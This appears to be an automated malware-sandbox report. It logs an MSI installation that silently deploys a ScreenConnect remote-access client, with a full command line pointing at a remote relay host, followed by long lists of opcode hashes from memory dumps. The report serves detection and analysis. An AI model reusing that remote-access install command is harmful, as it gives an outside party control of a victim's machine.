                                                                                                            Start time:10:20:12
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61F
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:10:20:14
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:10:20:14
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=OLD-01"
                                                                                                            Imagebase:0xb50000
                                                                                                            File size:95'512 bytes
                                                                                                            MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:9
                                                                                                            Start time:10:20:15
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User"
                                                                                                            Imagebase:0x7e0000
                                                                                                            File size:602'392 bytes
                                                                                                            MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:10:20:18
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                            Imagebase:0x7ff7403e0000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:11
                                                                                                            Start time:10:20:18
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System"
                                                                                                            Imagebase:0x570000
                                                                                                            File size:602'392 bytes
                                                                                                            MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:true

                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d6e0583b1176e581fcbb3a802cbad4c9ba2af3082adc39f19249f7a3b89a5e9a
                                                                                                              • Instruction ID: af7bb94807ffd4ecc25c06df1ed0d07b1f0b9ac9733bbf9f73910b08eed1158e
                                                                                                              • Opcode Fuzzy Hash: d6e0583b1176e581fcbb3a802cbad4c9ba2af3082adc39f19249f7a3b89a5e9a
                                                                                                              • Instruction Fuzzy Hash: C6512B35A10619CFCB04CFA9C88499EBBF6FF89700B25816AE505EF321DB71AD45CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d01c283b3cb6f36cfa99706fd57415457ca07cc3b1abff552eebe75eb559abe
                                                                                                              • Instruction ID: c1f094da492189d6b04274c1cad9efdaf07c3221f7f9c186a34bd94f6d200cf7
                                                                                                              • Opcode Fuzzy Hash: 9d01c283b3cb6f36cfa99706fd57415457ca07cc3b1abff552eebe75eb559abe
                                                                                                              • Instruction Fuzzy Hash: 12512A35A10619CFCB04CFA9C88499DBBF6FF8A700B25816AE505EF321DBB1AD45CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b6b3eae6cc190d323557b5c0d2b7d8bba2ced46de72ab2934e20b47907eeef45
                                                                                                              • Instruction ID: ca61db05330b69a1a44dfffe6022c5e10a46b3d385438acecb0d20e527e4b3fb
                                                                                                              • Opcode Fuzzy Hash: b6b3eae6cc190d323557b5c0d2b7d8bba2ced46de72ab2934e20b47907eeef45
                                                                                                              • Instruction Fuzzy Hash: 8A41A034B002098FDF05DEA9849466EBBA2FFC4310F588629E919DB385DF34DD058BE1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 02401b67356d523d1df610ca4fbedbdcc7d710f6c45831a81179fecb2679608c
                                                                                                              • Instruction ID: a09ec24aa03ef3b9edfa27fefc11df74311ed6f4a1165c9da0c5c1ca4d7fef04
                                                                                                              • Opcode Fuzzy Hash: 02401b67356d523d1df610ca4fbedbdcc7d710f6c45831a81179fecb2679608c
                                                                                                              • Instruction Fuzzy Hash: A9516C30E1030ADFDB14DFB9D854B9DBBB2FF89300F148659E514AB280EB75A985CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a42634d6f9845ad5eb9ba098427cca65541486cb037cfcd04f5729a6e4ebd49
                                                                                                              • Instruction ID: 23c87eb928a95f238cd5bcc30333570fb865f84131df0f47692693f5457e8bdb
                                                                                                              • Opcode Fuzzy Hash: 7a42634d6f9845ad5eb9ba098427cca65541486cb037cfcd04f5729a6e4ebd49
                                                                                                              • Instruction Fuzzy Hash: DC512F70600601CFDB18DF29D49466677B2FF8A325B048698E915DF3A9DB30E952CFD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 517d72c9c3ae991eab483e396d0761efb4cc41acdedc8e7fab5d60ca06425bab
                                                                                                              • Instruction ID: fa14821778a4661c2469203a9a04ad920fd942e1c90396a8a9879aebeacdb167
                                                                                                              • Opcode Fuzzy Hash: 517d72c9c3ae991eab483e396d0761efb4cc41acdedc8e7fab5d60ca06425bab
                                                                                                              • Instruction Fuzzy Hash: 5C514B30E1030ADFDB14DFB9D854B9DBBB2FF88300F148659E515AB290EB75A985CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 28f1ccaa786680a982b4880b683d8dc257bc6920838f8418213c7b6353dc46de
                                                                                                              • Instruction ID: 89d813ecf300c78afe9d2870f69b92a82aeb4e1b83fabe492f53d5f3f90b53d6
                                                                                                              • Opcode Fuzzy Hash: 28f1ccaa786680a982b4880b683d8dc257bc6920838f8418213c7b6353dc46de
                                                                                                              • Instruction Fuzzy Hash: E8411874700609DFDB09DB98D880A6A77FAFFCC314B988155E905CB315DB31DE028B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4039fcc9fac3b07daa6d6258ee2ac679a589cea56838757ad92634960e2c3780
                                                                                                              • Instruction ID: dbf431766ed21fe129235b0d88779437751ca18ad6152f774c17c9b53fb65034
                                                                                                              • Opcode Fuzzy Hash: 4039fcc9fac3b07daa6d6258ee2ac679a589cea56838757ad92634960e2c3780
                                                                                                              • Instruction Fuzzy Hash: 2C412E306002058FDF19DF29D89866A7BB1FF89324B0881A9E815DF299DB30E952CFD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 482aa2850abe9820cb3bb654f5d4a5cefb52ea7d8e690a8c6062663438223e38
                                                                                                              • Instruction ID: 5d8f610af84633b3902cd96e53f2e18c77854c589dae266e45a9da5311c519d8
                                                                                                              • Opcode Fuzzy Hash: 482aa2850abe9820cb3bb654f5d4a5cefb52ea7d8e690a8c6062663438223e38
                                                                                                              • Instruction Fuzzy Hash: 723116727053415FDF01DA7CC891A9ABFE2DF8722070C866AED55CB356DA30CA06C7A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 745ebb95af1fce02222ef96f6ea50550c23ea42d2c51cc0de8423dfee12f4a7c
                                                                                                              • Instruction ID: bd942a9a571d9ac4d8afb48dea561af1dd22bcd9b2ed663a791517219984764c
                                                                                                              • Opcode Fuzzy Hash: 745ebb95af1fce02222ef96f6ea50550c23ea42d2c51cc0de8423dfee12f4a7c
                                                                                                              • Instruction Fuzzy Hash: 74312A30B002058FEB149FA98498BBEBBF6AFC9754F188469E506EB354DF70DD048B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b239cc10f10a9fc4eacad839010de45f81119e7588e8b560f8daf42f1069d84d
                                                                                                              • Instruction ID: cb44487f3de1414a412e391a1b8474f35d1f52b5654a964162512891cdea4867
                                                                                                              • Opcode Fuzzy Hash: b239cc10f10a9fc4eacad839010de45f81119e7588e8b560f8daf42f1069d84d
                                                                                                              • Instruction Fuzzy Hash: EE415F74E012199FDB58DFAAD944AAEBBF2BF88300F14912AE815B7354DB345942CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 83ec49b916cc885ebf59adb4b98901be033d69141575b3c57a70211e9a1725a8
                                                                                                              • Instruction ID: 149aa684bdb4946c5adeb6ba8920cad35f0f0725caddcc51415881e922a47a71
                                                                                                              • Opcode Fuzzy Hash: 83ec49b916cc885ebf59adb4b98901be033d69141575b3c57a70211e9a1725a8
                                                                                                              • Instruction Fuzzy Hash: 6931EC74A00B058FD734DF2AC84866AB7F1AF89314B144A1CD566D7795D770EA46CBC0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fa83266aaa736bcaa7261b198a82a38d991e7cf8d1ff47b95238458afcc9dc69
                                                                                                              • Instruction ID: 2d5f6530969dacc98c113a3fb7a1ea1f3a30f11473dc2195c45efb4aaf7d1821
                                                                                                              • Opcode Fuzzy Hash: fa83266aaa736bcaa7261b198a82a38d991e7cf8d1ff47b95238458afcc9dc69
                                                                                                              • Instruction Fuzzy Hash: B121F775B402048FDB14DF68C498AAAB7F6AFC9750B188469E806EB351DB31EE01CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd9101e6856e8319d1ada5c0b4966fe4742aa7d63aeabf704b03ff1f1e0109e6
                                                                                                              • Instruction ID: 6e98bd6340efdd680904632ff61e88654bb4cfbd4da7af5e574311e96d8548eb
                                                                                                              • Opcode Fuzzy Hash: cd9101e6856e8319d1ada5c0b4966fe4742aa7d63aeabf704b03ff1f1e0109e6
                                                                                                              • Instruction Fuzzy Hash: 2F31E670A006018FD734DF2AC85466AB7F1AF89324B148A2CD596DB7A1DB71E9468FD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9849f760b7a074a20058ca6b92fafd6a3932ab23bda3e780dd46bc5cafe4c25
                                                                                                              • Instruction ID: 2c21bb07fad35dab9ea3bcc556b1b176c61147cf63d938f97bdbb544643a601b
                                                                                                              • Opcode Fuzzy Hash: b9849f760b7a074a20058ca6b92fafd6a3932ab23bda3e780dd46bc5cafe4c25
                                                                                                              • Instruction Fuzzy Hash: 4A210770B002058FDB14DFA9C498AAEB7F6AFC9750F188469E806E7351DB31EE00CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2149752404.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_16ed000_tiG6Ep202n.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f5cdbfd02a50146d4ed09e770ff441b287e7aba655b73810e7af33f3c18398ec
                                                                                                              • Instruction ID: 53b22ae82cebe1e6c4c21b61b8ae143d342cd0eee36bd48217f37fc4de2767b0
                                                                                                              • Opcode Fuzzy Hash: f5cdbfd02a50146d4ed09e770ff441b287e7aba655b73810e7af33f3c18398ec
                                                                                                              • Instruction Fuzzy Hash: D5F030B0D0020ADFDB64DFADC44566EBBF0AB44320F244A59D524D7391D77186418FD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: de1e202de082770a046195778a2c2f397a3c045ffa4e7f2462d76d301b42c7ee
                                                                                                              • Instruction ID: 8f3725f89dc683e29f6cc750dd5de3f0ebefe1618a41c7c8dbf7aa0dab38885c
                                                                                                              • Opcode Fuzzy Hash: de1e202de082770a046195778a2c2f397a3c045ffa4e7f2462d76d301b42c7ee
                                                                                                              • Instruction Fuzzy Hash: 09F05EB0D00619DFDB00DFA8D586AAEBFF0AB45310F540669E114E3281D77586418FD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d10790d78e739e78832c4e542233cd77402ee23779288bd03cc8953d7ca111c
                                                                                                              • Instruction ID: 38f36bab0438d62c5f9a8c9c21ad89f7f61c8d39a2ac8b2431087737f3df7d06
                                                                                                              • Opcode Fuzzy Hash: 6d10790d78e739e78832c4e542233cd77402ee23779288bd03cc8953d7ca111c
                                                                                                              • Instruction Fuzzy Hash: CEF01CB0D0420DDFCB50DFACD546AAEBFF0AB48314F1006AAE518E3291D77186418FC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cab8792f6abd0cd4f985f488e7a23719392bd423c02737a6795d727fc222e5df
                                                                                                              • Instruction ID: 010812fc966a8a15cca7d73a9f323308979de95df1511142f7c539adf30376bd
                                                                                                              • Opcode Fuzzy Hash: cab8792f6abd0cd4f985f488e7a23719392bd423c02737a6795d727fc222e5df
                                                                                                              • Instruction Fuzzy Hash: 4FE05974D04208AFDB54DFA9E45969DBFB5EB88301F0049AAE449D7350DB345A448F81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ceb7593a12adb8444ce11425f03e4e108a2cd95088d624c62ad036ca67cf86b5
                                                                                                              • Instruction ID: 49ac7f28bc256b65990a2b310604330905389f725c68ed0e5267fc69605f3a3b
                                                                                                              • Opcode Fuzzy Hash: ceb7593a12adb8444ce11425f03e4e108a2cd95088d624c62ad036ca67cf86b5
                                                                                                              • Instruction Fuzzy Hash: 46E01A34500349EBCB01EBB8E8456AEB7F5F744210F2181A9D90697200EA311E009B64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ffa1474598fa0e34785c0aa1bb42b487159554ceab495f674908549b01008c1
                                                                                                              • Instruction ID: 7e6fda309d1e566c7f3dccd848a2a396eeaf2725aa5231f15f9f12560b23272a
                                                                                                              • Opcode Fuzzy Hash: 6ffa1474598fa0e34785c0aa1bb42b487159554ceab495f674908549b01008c1
                                                                                                              • Instruction Fuzzy Hash: 0BE08671A41109DFCB40DBF4DA8275DBBB1EB48600F144569D808EB300D6316E019B50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a65e7053aaba27564bcc8caeef6148cf87eea1f793dcbeb93060b9769d8e61e
                                                                                                              • Instruction ID: 0628791d9f1b430052f719f6dadcfbd72d6f4bab8ba3d384c0ee31be6fc6f4ea
                                                                                                              • Opcode Fuzzy Hash: 8a65e7053aaba27564bcc8caeef6148cf87eea1f793dcbeb93060b9769d8e61e
                                                                                                              • Instruction Fuzzy Hash: 95E09274E0420CAFCB54EFA9D45599DBBB5AF88300F0085A9E809A7350EA345A048F81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 19378edfd68a5673098d8283ca1fd1e05407ae6f6ab9f2a1778735142502ec21
                                                                                                              • Instruction ID: ce1f35a344940b20e08646e8dfca2f18e6a94a0ace3f762c5eda5edf7767714b
                                                                                                              • Opcode Fuzzy Hash: 19378edfd68a5673098d8283ca1fd1e05407ae6f6ab9f2a1778735142502ec21
                                                                                                              • Instruction Fuzzy Hash: CCD01730A0120DEB8B00EFA8E90559EBBF9EB45210B1181AC990AD7200EA316E009BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0128d105cf8da46347016208036f489632f3c4bb5f671c465d6ab8188333e6c
                                                                                                              • Instruction ID: d59807300f4ea39b4cf8366f99e07f5fb4db9a0e9896e7208a1309e3e760eff3
                                                                                                              • Opcode Fuzzy Hash: f0128d105cf8da46347016208036f489632f3c4bb5f671c465d6ab8188333e6c
                                                                                                              • Instruction Fuzzy Hash: A7D01231A0110DEB8B00DFA4E94195DBBF5EB45200B5445A9D808D7200DA326E009790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 218d214312107bee6d5615a44e5498877a0ba48e5581983db3bf317c70c5ece0
                                                                                                              • Instruction ID: da54eac87194f5b8806f920c5a67c3d4c3ea5aa5280d59662101d5ea115cb4ce
                                                                                                              • Opcode Fuzzy Hash: 218d214312107bee6d5615a44e5498877a0ba48e5581983db3bf317c70c5ece0
                                                                                                              • Instruction Fuzzy Hash: 1CD0230370E384CBD7031194143C4AD3F61C1A172530D449FD24DC774BD4000811C3C7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2150049224.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1830000_tiG6Ep202n.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a8b7969c89886635f1f1a386789aa2a379cfdd49356da403917be9ea21f63b6
                                                                                                              • Instruction ID: ec0f701d1c239997f1bf8b3d5c3925a0230519280b47e27ac1758c6f4531bc79
                                                                                                              • Opcode Fuzzy Hash: 4a8b7969c89886635f1f1a386789aa2a379cfdd49356da403917be9ea21f63b6
